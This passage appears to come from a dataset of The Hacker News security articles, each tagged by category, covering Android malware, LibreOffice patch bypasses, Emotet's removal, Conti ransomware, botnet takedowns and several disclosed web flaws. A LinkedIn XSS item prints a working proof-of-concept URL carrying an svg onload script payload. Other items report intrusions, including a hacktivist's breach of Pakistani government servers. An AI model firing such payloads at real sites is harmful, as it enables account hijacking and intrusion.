Idea is the 3rd largest mobile services operator in India. Idea's strong growth in the Indian telephony market comes from its deep penetration in the non-urban and rural markets. IDEA Cellular is an Aditya Birla Group Company, India's first truly multinational corporation. The group operates in 26 countries, and is anchored by over 130,600 employees belonging to 40 nationalities. The Group has been adjudged the '6th Top Company for Leaders in Asia Pacific Region' in 2009, in a survey conducted by Hewitt Associates, in partnership with The RBL Group, and Fortune. The Group has also been rated 'The Best Employer in India and among the Top 20 in Asia' by the Hewitt-Economic Times and Wall Street Journal Study 2007.
Disclaimer
No data has been dumped; zSecure Team randomly tried the security of ideacellular web portal and in our very first attempt they discovered this critical flaw. Since this flaw was discovered in their very first attempt, existence of other flaws can't be denied.
Database has been accessed just to take screenshots so that they can make company believe that the aforesaid flaw actually because most of the companies use to treat the like advisories/disclosure as junk and don't believe the researcher's which may later cause them huge.
As well said zSecure Team respect the confidentiality of Ideacelluar that's why they restricted the contents of their screen-shots to database tables only. W e hope that company Ideacellular will take some immediate steps to fix-up this critical vulnerability asap.
Source
",Vulnerability
Another Malware from Android Market infect Millions of Users,https://thehackernews.com/2012/01/another-malware-from-android-market.html,"Another Malware from Android Market infect Millions of Users
Malware might have infected more than 5 million Android mobile devices via deliberately corrupted apps sold in the Android Marketplace, according to security firm Symantec. They reckoned Android.Counterclank, a slight variant of Android.Tonclank.
Symantec explains that the malicious code appears in a package called ""apperhand"", and a service under the same name can been seen running on the infected device when it's executed. According to Symantec, the Trojan has been identified in 13 different apps in the Android Marketplace.
Symantec's Security Response Team Director, Kevin Haley said:""They don't appear to be real publishers. There aren't rebundled apps, as we've seen so many times before."" Symantec also noted that this slimy piece of malware has the highest distribution of any malware identified so far this year and may actually be the largest malware infection seen by Android users in the operating systems short life.
The malware is actually a Trojan that attacks Android smartphones. Upon installation, it collects a wide scope of data, including the handset maker and bookmark copies. Moreover, it modifies the home page of the browser. As a result, hackers have earned some money from the malware by pushing some unwanted advertisements on the compromised Android devices.One of the reasons why the malware has affected such a huge number of Android users is because they do not bother reading privacy agreements. They simply approve these apps, without even reading information on them.
Symantec stated it had notified Google of the apps hiding malicious code. However, many of the infected entries were still available on the Android Market as of Friday afternoon. For removal of the malware, Symantec is advising smartphone users to uninstall the infected applications and run a mobile antivirus program. It's time Google started taking security much more seriously.
",Malware
Patches for 2 Severe LibreOffice Flaws Bypassed — Update to Patch Again,https://thehackernews.com/2019/08/libreoffice-patch-update.html,"If you are using LibreOffice, you need to update it once again.
LibreOffice has released the latest version 6.2.6/6.3.0 of its open-source office software to address three new vulnerabilities that could allow attackers to bypass patches for two previously addressed vulnerabilities.
LibreOffice is one of the most popular and open source alternatives to Microsoft Office suite and is available for Windows, Linux and macOS systems.
One of the two vulnerabilities, tracked as CVE-2019-9848, that LibreOffice attempted to patch just last month was a code execution flaw that affected LibreLogo, a programmable turtle vector graphics script that ships by default with LibreOffice.
This flaw allows an attacker to craft a malicious document that can silently execute arbitrary python commands without displaying any warning to a targeted user.
Apparently, the patch for this vulnerability was insufficient, as The Hacker News also reported late last month, which allowed two separate security researchers to bypass the patch and re-enable the attack by exploiting two new vulnerabilities, as explained below:
CVE-2019-9850: Discovered by Alex Inführ, the vulnerability in LibreOffice exists due to insufficient URL validation that allows malicious attackers to bypass the protection added to patch CVE-2019-9848 and again trigger calling LibreLogo from script event handlers.
CVE-2019-9851: Discovered by Gabriel Masei, this flaw resides in a separate feature where documents can specify pre-installed scripts, just like LibreLogo, which can be executed on various global script events such as document-open, etc.
The patch for the second vulnerability (CVE-2018-16858) that LibreOffice released in February has successfully been bypassed, re-enabling the directory traversal attack that could allow malicious documents to execute any script from arbitrary locations on the victim's file system.
CVE-2019-9852: Discovered by Nils Emmerich of ERNW Research GmbH, a URL encoding attack could allow attackers to bypass patch for directory traversal attack.
By successfully exploiting all these three vulnerabilities, a remote attacker can silently execute malicious commands on a targeted computer by convincing the victim into just opening a maliciously-crafted document file.
LibreOffice users are highly recommended to update their office software to the latest patched version 6.2.6/6.3.0 as soon as possible in order to avoid becoming victims to any attack exploiting these vulnerabilities.
",Vulnerability
Emotet Malware Destroys Itself From All Infected Computers,https://thehackernews.com/2021/04/emotet-malware-destroys-itself-today.html,"Emotet, the notorious email-based Windows malware behind several botnet-driven spam campaigns and ransomware attacks, was automatically wiped from infected computers en masse following a European law enforcement operation.
The development comes three months after a coordinated disruption of Emotet as part of ""Operation Ladybird"" to seize control of servers used to run and maintain the malware network. The orchestrated effort saw at least 700 servers associated with the botnet's infrastructure neutered from the inside, thus preventing further exploitation.
Law enforcement authorities from the Netherlands, Germany, the U.S., U.K., France, Lithuania, Canada, and Ukraine were involved in the international action.
Previously, the Dutch police, which seized two central servers located in the country, said it had deployed a software update to counter the threat posed by Emotet effectively. ""All infected computer systems will automatically retrieve the update there, after which the Emotet infection will be quarantined,"" the agency noted back in January.
This involved pushing a 32-bit payload named ""EmotetLoader.dll"" via the same channels that were used to distribute the original Emotet to all compromised machines. The cleanup routine, which was set to trigger itself automatically on April 25, 2021, worked by removing the malware from the device, in addition to deleting the autorun Registry key and terminating the process.
Now on Sunday, cybersecurity firm Malwarebytes confirmed that its Emotet-infected machine that had received the specially-crafted time bomb code had successfully initiated the uninstallation routine and removed itself from the Windows system.
As of writing, Abuse.ch's Feodo Tracker shows none of the Emotet servers are online. However, it remains to be seen if this ""final"" blow to the botnet will cause it to bounce back in the future or render it permanently inoperable, paving the way for other cybercrime actors to fill the void.
""Historically, Emotet's operators used long breaks in activity to improve their malware,"" Redscan researchers noted on Friday. ""This means there is a realistic possibility that Emotet's operators will use this opportunity to make the loader malware even more resilient, for example, by using polymorphic techniques to counter future coordinated action. They could also use the Emotet source code to branch off and create smaller, independent botnets.""
The mass action marks the second time law enforcement agencies have intervened to remove malware from compromised machines.
Earlier this month, the U.S. government took steps to remove web shell backdoors dropped by the Hafnium threat actor from Microsoft Exchange servers located in the country that were breached using ProxyLogon exploits.
Following the court-authorized operation, the Federal Bureau of Investigation said it's in the process of notifying all the organizations from which it had removed web shells, implying the intelligence agency accessed the systems without their knowledge.
",Cyber_Attack
Cross Site Scripting (XSS) Vulnerability in Google,https://thehackernews.com/2012/01/cross-site-scripting-xss-vulnerability.html,"Cross Site Scripting (XSS) Vulnerability in Google
Ucha Gobejishvili Hacker with codename ""longrifle0x"" discovered another Cross Site Scripting (XSS) Vulnerability in Google's Website. He already reported about the Vulnerability to Google Security Experts.
Proof of Concept:
Open https://www.google.com/a/cpanel/premier/new3?hl=en and Click Find Domain .
Put xss code:
Another XSS Vulnerabilities Discovered by longrifle0x https://xssed.com/archive/author=longrifle0x/special=1/
",Vulnerability
These Are The FBI's Most Wanted Hackers — Total $4.2 Million Reward,https://thehackernews.com/2015/07/fbi-most-wanted-hackers.html,"The US State Department and the Federal Bureau of Investigation are willing to pay a total $4.2 Million for information leading to the arrest and/or conviction of top 5 most wanted cyber criminals accused of conducting frauds of hundreds of millions of dollars.
Evgeniy Bogachev,30; Nicolae Popescu, 34; Alexsey Belan, 28; Peteris Sahurovs, 26; and Shailesh Kumar Jain, 45; are in the list of FBI's Top 5 most-wanted hackers.
1. Evgeniy Mikhailovich Bogachev | Reward - $3 MILLION
Evgeniy Mikhailovich Bogachev, also known under the aliases ""lucky12345,"" ""Slavik,"" and ""Pollingsoon,"" is the mastermind behind the GameOver Zeus botnet, which was allegedly used by criminals to infect more than 1 Million computers, resulting in up to $100 Million in losses since 2009.
Besides GameOver Zeus botnet, Bogachev is also accused of developing CryptoLocker Ransomware, which was designed to extort money from computer victims by holding their system's files hostage until the victim pays a ransom fee to get them back.
Bogachev tops the FBI target's list with $3 Million in reward for anyone giving the information leading to his direct arrest and/or conviction.
2. Nicolae Popescu | Reward - $1 Million
Nicolae Popescu, who also used the aliases Niculae Popescu, Nae Popescu, Nicolae Petrache, ""Nae"", and ""Stoichitoiu"", second topped the FBI's 5 Most-Wanted Cyber Criminals list.
This 34-year-old Romanian is accused of fooling innocent Americans with fake auction posts on several websites, including eBay, Cars.com, and AutoTrader.com, claiming to sell cars that just didn't exist.
Popescu and other criminal hackers affiliated with the scheme made more than $3 Million off the auctions, victimizing almost 800 users who handed over money for imaginary cars, Rolex watches, yachts, private airplanes, and other luxury goods.
Authorities tracked down and arrested six members of the cyber gang in late 2012, but Popescu and a partner slipped away.
3. Alexsey Belan | Reward - $100,000
Alexsey Belan, a Russian national, is wanted for allegedly stealing consumer data by compromising the cyber security systems of three unnamed major US-based e-commerce sites in Nevada and California between 2012 and 2013.
After stealing and exporting user databases with passwords to his server, Belan is accused of allegedly negotiating the sales of the databases.
4. Peteris Sahurovs | Reward - $50,000
Peteris Sahurovs is accused of developing and selling a computer virus through advertisements on news website pages. He allegedly carried out the scheme from February 2010 to September 2010.
Under the malicious scheme, the fake ads displayed on the web pages forced users to purchase fraudulent antivirus software.
In case, a user refuse to buy the software, the victim's desktop would be flooded with pop-ups and fake security alerts.
Sahurovs, a native of Latvia, made more than $2 Million by selling his ""antivirus"" software.
5. Shailesh Kumar Jain | Reward - $50,000
Shailesh Kumar Jain is the only American citizen on the FBI's Most Wanted Hackers list.
Jain made $100 Million between December 2006 and October 2008, according to the FBI. He used a flood of pop-up ads and email scamming to convince users that their computers were infected with a virus and then selling them the bogus AV software packages for between $30 and $70.
",Malware
FBI Warns Conti Ransomware Hit 16 U.S. Health and Emergency Services,https://thehackernews.com/2021/05/fbi-warns-conti-ransomware-hit-16-us.html,"The adversary behind Conti ransomware targeted no fewer than 16 healthcare and first responder networks in the U.S. within the past year, totally victimizing over 400 organizations worldwide, 290 of which are situated in the country.
That's according to a new flash alert issued by the U.S. Federal Bureau of Investigation (FBI) on Thursday.
""The FBI identified at least 16 Conti ransomware attacks targeting U.S. healthcare and first responder networks, including law enforcement agencies, emergency medical services, 9-1-1 dispatch centers, and municipalities within the last year,"" the agency said.
Ransomware attacks have worsened over the years, with recent targets as varied as state and local governments, hospitals, police departments, and critical infrastructure. Conti is one of many ransomware strains that have capitulated on that trend, commencing its operations in July 2020 as a private Ransomware-as-a-Service (RaaS), in addition to jumping on the double extortion bandwagon by launching a data leak site.
Based on an analysis published by ransomware recovery firm Coveware last month, Conti was the second most prevalent strain deployed, accounting for 10.2% of all the ransomware attacks in the first quarter of 2021.
Infections involving Conti have also breached the networks of Ireland's Health Service Executive (HSE) and Department of Health (DoH), prompting the National Cyber Security Centre (NCSC) to issue an alert of its own on May 16, stating that ""there are serious impacts to health operations and some non-emergency procedures are being postponed as hospitals implement their business continuity plans.""
Conti operators are known for infiltrating enterprise networks and spreading laterally using Cobalt Strike beacons prior to exploiting compromised user credentials to deploy and execute the ransomware payloads, with the encrypted files renamed with a "".FEEDC"" extension. Weaponized malicious email links, attachments, or stolen Remote Desktop Protocol (RDP) credentials are some of the tactics the group used to gain an initial foothold on the target network, the FBI said.
""The actors are observed inside the victim network between four days and three weeks on average before deploying Conti ransomware,"" the agency noted, adding the ransom amounts are tailored to each victim, with recent demands ratcheting up to as high as $25 million.
The alert also comes amid a proliferation of ransomware incidents in recent weeks, even as extortionists continue to seek exorbitant prices from companies in hopes of landing a huge, quick payday. Insurance major CNA Financial is said to have paid $40 million, while Colonial Pipeline and Brenntag have each shelled out nearly $4.5 million to regain access to their encrypted systems.
",Malware
"Wiper, the Destructive Malware possibly connected to Stuxnet and Duqu",https://thehackernews.com/2012/09/wiper-destructive-malware-possibly.html,"Kaspersky Lab publishes research resulting from the digital forensic analysis of the hard disk images obtained from the machines attacked by the Wiper - a destructive malware program attacking computer systems related to oil facilities in Western Asia.
Security researchers from Kaspersky Lab have uncovered information suggesting a possible link between the mysterious malware that attacked Iranian oil ministry computers in April and the Stuxnet and Duqu cyber espionage threats.
The malware wipes data from hard drives, placing high priority on those with a .pnf extension, which are the type of files Stuxnet and Duqu used, and has other behavioral similarities, according to Schouwenberg.
It also deletes all traces of itself. As a result, researchers have not been able to get a sample, but they've reviewed mirror images left on hard drives. Kaspersky's researchers were not able to find the mysterious malware, which was given the name Wiper, because very little data from the affected hard disk drives was recoverable.
Even though a connection to Flame is unlikely, there is some evidence suggesting that Wiper might be related to Stuxnet or Duqu.For example, on a few of the hard drives analyzed, the researchers found traces of a service called RAHDAUD64 that loaded files named ~DFXX.tmp where XX are two random digits from the C:\WINDOWS\TEMP folder.
No one has ever found a sample of Wiper in order to study its code and determine exactly what it did to machines in Iran. According to Kaspersky, the malware's algorithm is ""designed to quickly destroy as many files as effectively as possible, which can include multiple gigabytes at a time.""
Although Flame can be updated by its creators with various modules, including conceivably a module that would destroy data, there has never been any evidence found that Flame had a module that was used to destroy data on machines or wipe out hard drives.
",Vulnerability
Android 4.0.4 multiple Zero-Day Vulnerabilities,https://thehackernews.com/2012/09/android-404-multiple-zero-day.html,"The Samsung Galaxy S3 can be hacked via NFC, allowing attackers to download all data from the Android smartphone, security researchers demonstrated during the Mobile Pwn2Own contest in Amsterdam.
Using a pair of zero day vulnerabilities, a team of security researchers from U.K.-based MWR Labs hacked into a Samsung Galaxy S3 phone running Android 4.0.4 by beaming an exploit via NFC (Near Field Communications).
NFC is a technology that allows data to be sent over very short distances. For mobile devices, the protocol allows digital wallet applications to transfer money to pay at the register. While the technology has been slow to take off, despite the adoption by Google for its Wallet payment application, a number of recent high-profile announcements have boosted its adoption.
""Through NFC it was possible to upload a malicious file to the device, which allowed us to gain code execution on the device and subsequently get full control over the device using a second vulnerability for privilege escalation,"" MWR InfoSecurity said in a statement. ""The same vulnerability could also be exploited through other attack vectors, such as malicious websites or e-mail attachments.""
The attacker, for instance, gets access to all SMS messages, pictures, emails, contact information and much more. The payload is very advanced, so attackers can ""basically do anything on that phone,"" the researchers said.
How this Works:
1.) The first, a memory corruption flaw, was exploited via NFC (by holding two Galaxy S 3s next to each other) to upload a malicious file, which in turn allowed the team to gain code execution on the device.
2.) The malware then exploited a second vulnerability to gain full control over the device using privilege escalation. This undermined Android's app sandbox model, allowing the attackers to install their customised version of Mercury, the company's Android assessment framework.
3.) Mercury was then used to exfiltrate user data on the device (such as contacts, emails, text messages, and pictures) to a remote listener.
Researchers also said that,""Crucially, the ASLR implementation is incomplete in Android 4.0.4, and does not cover Bionic (Android's linker) and /system/bin/app_process, which is responsible for starting applications on the device. Other protections which would make exploitation harder were also found to be absent.""
MWR Labs, which won $30,000 for its hack, is planning a more technical blog post detailing the process of finding and exploiting this bug.
Also, a Dutch research Joost Pol , CEO of Certified Secure, a nine-person research outfit based in The Hague hack into Apple's iPhone 4S from scratch, exploited a WebKit vulnerability to launch a drive-by download when the target device simply surfs to a booby-trapped web site.
They used code auditing techniques to ferret out the WebKit bug and then spent most of the three weeks chaining multiple clever techniques to get a ""clean, working exploit.""
During the Pwn2Own attack, Pol created a web site that included an amusing animation of the Certified Secure logo taking a bite of the Apple logo. The drive-by download attack did not crash the browser so the user was oblivious to the data being uploaded to the attacker's remote server. ""If this is an attack in the wild, they could embed the exploit into an ad on a big advertising network and cause some major damage.""
The duo destroyed the exploit immediately after the Pwn2Own hack. ""We shredded it from our machine. The story ends here, we're not going to use this again. It's time to look for a new challenge,"" Pol said.He provided the vulnerability and proof-of-concept code that demonstrates the risk to contest organizers at HP TippingPoint Zero Day Initiative (ZDI).
",Vulnerability
LinkedIn with Two-factor authentication and Cross Site Scripting Flaw,https://thehackernews.com/2013/06/linkedin-with-two-factor-authentication.html,"Two Factor Authentication is becoming a standard in the enterprise security space in an attempt to dually secure end users against malicious attacks.
Following Dropbox, Google and virtually everyone else, LinkedIn added two-factor authentication to its login process today.
LinkedIn will provide temporary codes for two-factor authentication through SMS messages. The extra step is designed to lessen the chances of computer hackers breaking into user accounts.
To turn on two-step verification on LinkedIn, hit the icon in the top-right corner of the site, click on ""Privacy & Settings,"" and then on ""Manage security settings"" at the bottom.
The site has provided instructions to its 225 million users on how to turn on the optional service.
On other side, today @The_Pr0ph3t, whitehat Hacker from Spain reported a Cross Site Scripting Vulnerability in LinkedIn Developer site (developer.linkedin.com).
Flaw still exists on website at the time of writing, and hacker also reported the flaw to LinkedIn developer team for patch.
Proof of Concept:
https://developer.linkedin.com/search/node/%22%3E%3Csvg/onload%3Dalert%281%29%3B%3E%22%3E%3Csvg/onload%3Dalert%281%29%3B%3E
",Vulnerability
Hackers Exploit Microsoft Browser Bug to Deploy VBA Malware on Targeted PCs,https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html,"An unidentified threat actor has been exploiting a now-patched zero-day flaw in Internet Explorer browser to deliver a fully-featured VBA-based remote access trojan (RAT) capable of accessing files stored in compromised Windows systems, and downloading and executing malicious payloads as part of an ""unusual"" campaign.
The backdoor is distributed via a decoy document named ""Manifest.docx"" that loads the exploit code for the vulnerability from an embedded template, which, in turn, executes shellcode to deploy the RAT, according to cybersecurity firm Malwarebytes, which spotted the suspicious Word file on July 21, 2021.
The malware-laced document claims to be a ""Manifesto of the inhabitants of Crimea"" calling on the citizens to oppose Russian President Vladimir Putin and ""create a unified platform called 'People's Resistance.'""
The Internet Explorer flaw, tracked as CVE-2021-26411, is notable for the fact that it was abused by the North Korea-backed Lazarus Group to target security researchers working on vulnerability research and development.
Earlier this February, South Korean cybersecurity firm ENKI revealed the state-aligned hacking collective had made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer. Microsoft addressed the issue as part of its Patch Tuesday updates for March.
The Internet Explorer exploit is one of the two ways that's used to deploy the RAT, with the other method relying on a social engineering component that involves downloading and executing a remote macro-weaponized template containing the implant. Regardless of the infection chain, the use of double attack vectors is likely an attempt to increase the likelihood of finding a path into the targeted machines.
""While both techniques rely on template injection to drop a full-featured remote access trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery,"" Malwarebytes researcher Hossein Jazi said in a report shared with The Hacker News. ""The attackers may have wanted to combine social engineering and exploit to maximize their chances of infecting targets.""
Besides collecting system metadata, the VBA RAT is orchestrated to identify antivirus products running on the infected host and execute commands it receives from an attacker-controlled server, including reading, deleting, and downloading arbitrary files, and exfiltrate the results of those commands back to the server.
Also discovered by Malwarebytes is a PHP-based panel nicknamed ""Ekipa"" that's used by the adversary to track victims and view information about the modus operandi that led to the successful breach, highlighting successful exploitation using the IE zero-day and the execution of the RAT.
""As the conflict between Russia and Ukraine over Crimea continues, cyber attacks have been increasing as well,"" Jazi said. ""The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag.""
",Malware
Pakistan Government servers messed up after security breach,https://thehackernews.com/2013/03/pakistan-government-servers-messed-up.html,"Today a cyber attack on Pakistan Government servers crash many Government departments's official websites including Ministry of Information Technology, Ministry of Railways, Ministry of Economic Affairs & Statistics, Ministry of Interior, Ministry of Religious Affairs, Ministry of Science and Technology, Ministry of Environment and many more.
Indian Hacker 'Godzilla' continue to strike Pakistan Government because of their support to terrorism activities. Hacker said,""all network owned including switches because they deserve it, I have not touched any innocent website because target is only Government""
While Pakistani official are already aware about the risk from the newest viruses, worms and cyber attacks, so they having their servers running through a proxy server located at https://202.83.164.6/ ,but flawed cyber security practices once again results to messed up whole setup and hacker successfully breach into centralized local server located at 192.168.70.103 b/w website hosting server & proxy server at machine.
Hacker claimed to breach this centralized IBM server with Layer 2-3 Gigabit Ethernet Switch Module for IBM eServer, BladeCenter. This IBM server further connected to 22 local machines that were used to build the proxy server, that was securing the digital cyber space of Pakistan.
""They are running it through a local system 192.168.70.103 which is been shut down as we have access of the switch"" he said.
After attack, shutdown of above server
Websites under attack:
www.moitt.gov.pk
www.railways.gov.pk
www.ead.gov.pk
www.interior.gov.pk
www.ipc.gov.pk
www.mora.gov.pk
www.establishment.gov.pk
www.housing.gov.pk
www.mosp.gov.pk
www.planningcommission.gov.pk
www.minorities.gov.pk
www.lgrd.gov.pk
www.moenv.gov.pk
More than 24 hours, the Gateway of Pakistan website (https://www.pakistan.gov.pk/) was also down because of same security breach, but official managed to recover that server after removing routing that one via same targeted proxy server.
Hacker also claimed to have access to File server of Pakistan Government. Network and server admins are working hardly to fix the issue generated after security breach, at the time of reporting this news,above listed all sites are down.
",Cyber_Attack
Watering Hole Attack Was Used to Target Florida Water Utilities,https://thehackernews.com/2021/05/watering-hole-attack-was-used-to-target.html,"An investigation undertaken in the aftermath of the Oldsmar water plant hack earlier this year has revealed that an infrastructure contractor in the U.S. state of Florida hosted malicious code on its website in what's known as a watering hole attack.
""This malicious code seemingly targeted water utilities, particularly in Florida, and more importantly, was visited by a browser from the city of Oldsmar on the same day of the poisoning event,"" Dragos researcher Kent Backman said in a write-up published on Tuesday.
The site, which belongs to a Florida-based general contractor involved in building water and wastewater treatment facilities, had no bearing on the intrusion, the American industrial cybersecurity firm said.
Watering hole attacks typically allow an adversary to compromise a specific group of end-users by compromising a carefully selected website, which members of that group are known to visit, with an intention to gain access to the victim's system and infect it with malware.
In this specific case, however, the infected website didn't deliver exploit code or attempt to achieve access to visitors' systems. Instead, the injected code functioned as a browser enumeration and fingerprinting script that harvested various details about the website's visitors, including operating system, CPU, browser (and plugins), input methods, presence of a camera, accelerometer, microphone, time zone, locations, video codecs, and screen dimensions.
The collected information was then exfiltrated to a database hosted on a Heroku app site (bdatac.herokuapp[.]com) that also stored the script. The app has since been taken down. Dragos suspects a vulnerable WordPress plugin may have been exploited to insert the script into the website's code.
No fewer than 1,000 end-user computers visited the infected site during the 58-day window beginning Dec. 20, 2020, before it was remediated on Feb. 16, 2021. ""Those who interacted with the malicious code included computers from municipal water utility customers, state and local government agencies, various water industry-related private companies, and normal internet bot and website crawler traffic,"" Backman said.
""Dragos' best assessment is that an actor deployed the watering hole on the water infrastructure construction company site to collect legitimate browser data for the purpose of improving the botnet malware's ability to impersonate legitimate web browser activity,"" the researcher added.
Based on telemetry data gathered by the company, one among those 1,000 visits came from a computer residing in the network belonging to the City of Oldsmar on Feb. 5, the same day an unidentified adversary managed to increase sodium hydroxide dosage in the water supply to dangerous levels by remotely accessing the SCADA system at the water treatment plant.
The attackers were ultimately foiled in their attempt by an operator, who managed to catch the manipulation in real-time and restored the concentration levels to undo the damage. The unauthorized access is said to have occurred via TeamViewer remote desktop software installed on one of the plant's several computers that were connected to the control system.
The Oldsmar plant cyberattack, and more recently the Colonial Pipeline ransomware incident, have set off concerns about the potential for tampering with industrial control systems deployed in critical infrastructure, prompting the U.S. government to take steps to bolster defenses by protecting federal networks and improving information-sharing between the U.S. government and the private sector on cyber issues, among others.
""This is not a typical watering hole,"" Backman said. ""We have medium confidence it did not directly compromise any organization. But it does represent an exposure risk to the water industry and highlights the importance of controlling access to untrusted websites, especially for Operational Technology (OT) and Industrial Control System (ICS) environments.""
",Cyber_Attack
Apple Safari Browser Vulnerable to URL Spoofing Vulnerability,https://thehackernews.com/2015/05/safari-url-spoofing.html,"A serious security vulnerability has been uncovered in Apple's Safari web browser that could trick Safari users into visiting a malicious website with the genuine web address.
A group of researchers, known as Deusen, has demonstrated how the address spoofing vulnerability could be exploited by hackers to fool victim into thinking they are visiting a trusted website when actually the Safari browser is connected to an entirely different address.
This flaw could let an attacker lead Safari users to a malicious site instead of a trusted website they willing to connect to install malicious software and steal their login credentials.
The vulnerability was discovered by the same group who reported a Universal Cross Site Scripting (XSS) flaw in all the latest patched versions of Microsoft's Internet Explorer in February this year that put IE users' credentials and other sensitive information at risk.
The group recently published a proof-of-concept exploit code that makes the Safari web browser to display the Daily Mail's website (dailymail.co.uk) although the browser is displaying the contents from deusen.co.uk.
The POC works on fully patched versions of Apple's mobile operating system (iOS) as well as desktop operating system (OS X).
What's even worse?
The vulnerability could be exploited by hackers to launch highly credible phishing attacks or hijack users' accounts on any website.
Instead of Daily Mail website, a hacker could use a bank website and then inject a rogue form asking the user for private financial information.
Based on a quick analysis, the demo page appears to force Safari user to visit the daily mail URL, as you can see in the browser's user interface. The script quickly loads another URL before the page can be loaded.
The script looks like the following:
At this point, Apple has not confirmed that whether the vulnerability is actively exploited by the cyber criminals in the wild. However, Apple has yet to comment on the issue.
",Vulnerability
Europol Takes Down RAMNIT Botnet that Infected 3.2 Million Computers,https://thehackernews.com/2015/02/europol-takes-down-ramnit-botnet-that.html,"It seems like the world has declared war against the Cyber Criminals. In a recent update, we reported that FBI is offering $3 Million in Reward for the arrest of GameOver Zeus botnet mastermind, and meanwhile British cyber-police has taken down widely-spread RAMNIT botnet.
The National Crime Agency (NCA) in a joint operation with Europol's European Cybercrime Centre (EC3) and law enforcement agencies from Germany, Italy, the Netherlands, and the United Kingdom has taken down the Ramnit ""botnet"", which has infected over 3.2 million computers worldwide, including 33,000 in the UK.
Alike GameOver Zeus, RAMNIT is also a 'botnet' - a network of zombie computers which operate under criminal control for malicious purposes like spreading viruses, sending out spam containing malicious links, and carrying out distributed denial of service attacks (DDoS) in order to bring down target websites.
RAMNIT believes to spread malware via trustworthy links sent through phishing emails or social networking sites, and mainly target people running Windows operating systems in order to steal money from victims bank accounts. Moreover, public FTP servers have also been found distributing the malware.
Once installed, the infected computer comes under the control of the botnet operators. The module inadvertently downloads a virus onto the victim's computer which could be used by operators to access personal or banking information, steal passwords and disable anti-virus protection.
RAMNIT SHUT-DOWN IN AN OPERATION
In a statement on Tuesday, Europol revealed that the successful take-down of Ramnit botnet involved the help of Microsoft, Symantec and AnubisNetworks. The groups shut down the botnet's command and control infrastructure and redirected traffic from a total of 300 domain addresses used by Ramnit criminal operators.
""This successful operation shows the importance of international law enforcement working together with private industry in the fight against the global threat of cybercrime,"" said Wil van Gemart, Europol's deputy director of operations. ""We will continue our efforts in taking down botnets and disrupting the core infrastructures used by criminals to conduct a variety of cybercrimes.""
NASTY FEATURES OF RAMNIT BOTNET
Symantec says that Ramnit has been around for over four years, first originating as a computer worm. According to the anti-virus firm, Ramnit is a ""fully-featured cybercrime tool, featuring six standard modules that provide attackers with multiple ways to compromise a victim."" The features are:
SPY MODULE - This is one of the most powerful Ramnit features, as it monitors the victim's web browsing and detects when they visit online banking sites. It can also inject itself into the victim's browser and manipulate the bank's website in such a way that it appears legitimate and easily grab victim's credit card details.
COOKIE GRABBER - This steals session cookies from web browsers and send them back to the Ramnit operators, who can then use the cookies to authenticate themselves on websites and impersonate the victim. This could allow an attacker to hijack online banking sessions.
DRIVE SCANNER - This scans the computer's hard drive and steals files from it. The scanner is configured in such a way that it searches for specific folders which contain sensitive information such as victims' passwords.
ANONYMOUS FTP SERVER - By connecting to this server, the malware lets attackers remotely access the infected computers and browse the file system. The server can be used to upload, download, or delete files and execute commands.
VIRTUAL NETWORK COMPUTING (VNC) MODULE - This feature provides the attackers with another means to gain remote access to the compromised computers.
FTP GRABBER - This feature allows the attackers to gather login credentials for a large number of FTP clients.
WHY BOTNET RE-EMERGE AFTER TAKEDOWNS ?
According to the authorities, Ramnit botnet has been taken down, but is it guaranteed that the botnet will not re-emerged again? We have seen the took down of GameOver Zeus botnet by FBI and Europol as well, but what happened at last? Just after a month, GameOver Zeus botnet again came into operation with more nasty features.
So, What went wrong? Why Botnet take downs are ineffective? One reason could be that the organisations grab and take-down only a small fraction of command-and-control domains that build up the Botnet critical infrastructure, but leaves a majority of fraction active. This takes some months for a botnet operator to recover.
As more and more botnet networks are taken down by Law Enforcement, cyber criminals are increasingly using secondary communication methods, such as peer-to-peer or domain generation algorithms (DGA).
One of the main reasons that the Botnet re-emerged is because the author of the malware didn't get arrested. No matter how many domains are taken down or how many sinkholes researchers create, if the attackers are not arrested, nobody can stop them from building new Botnet from zero.
On this we really appreciate the FBI step to reward $3 Million for the information leading to the direct arrest or conviction of Evgeniy Mikhailovich Bogachev, the alleged author of GameOver Zeus botnet that was used by cybercriminals to steal more than $100 Million from online bank accounts.
",Malware
HackerProof : Your Guide To PC Security,https://thehackernews.com/2012/10/hackerproof-your-guide-to-pc-security.html,"With over 140,000 known computer viruses and 85,000,000 spam emails sent out each day, the likelihood of your PC coming into contact with malware such as viruses, worms, and spyware is almost guaranteed.
It is very important to secure your computer just like you would secure your house or car. Your computer can be completely taken over without your permission or knowledge if it is vulnerable and connected to the Internet. Hackers constantly scan the Internet looking for vulnerable hosts, and a computer can be infected by a worm or virus within 15 minutes of connecting to the Internet if certain precautions are not taken.
You can avoid most common infections by taking just a few steps, Here is an overview of PC security best practices and tips - ""HackerProof : Your Guide To PC Security"" This 53 page guide provides an objective, detailed, but easily understood walk through of PC security. By the end of this guide, you will know exactly what PC security means and, more importantly, what you need to do to keep your PC secure.
Book includes:
The history and types of modern malware
Which operating system is most secure
Good security habits that keep you safe
Software that can protect you
The importance of backing up your data
Recovering from a malware attack
Download ""HackerProof"" Guide
Subscribe to our Daily Newsletter via email - Be First to know about Security and Hackers. or Join our Huge Hackers Community on Facebook, Google+ and Twitter.
",Malware
miniFlame - A New cyber espionage malware discovered,https://thehackernews.com/2012/10/miniflame-new-cyber-espionage-malware.html,"Kaspersky has discovered new malware dubbed 'miniFlame', cyber espionage software directly linked to Flame. This new nation-state espionage malware that has ties to two previous espionage tools known as Flame and Gauss, and that appears to be a ""high-precision, surgical attack tool"" targeting victims in Lebanon, Iran and elsewhere.
miniFlame, also known as SPE, was found by Kaspersky Lab's experts in July 2012, and was originally identified as a Flame module. But originally MiniFlame seems to be used to gain control of and obtain increased spying capability over select computers originally infected by the Flame and Gauss spyware.
According to Kaspersky, versions of miniFlame were created in 2010 and 2011, and some of the six variants are still considered active. It is expected that development of the malicious program could have started as far back as 2007. ""MiniFlame is a high precision attack tool,"" said Alexander Gostev, Chief Security Expert, Kaspersky Lab, describing the malware. ""Most likely it is a targeted cyber weapon used in what can be defined as the second wave of a cyberattack.""
Main results of miniFlame analyses:
miniFlame aka SPE, based on the same architectural platform as Flame. It can run as a standalone program or cyber espionage as an internal component of Flame and Gauss.
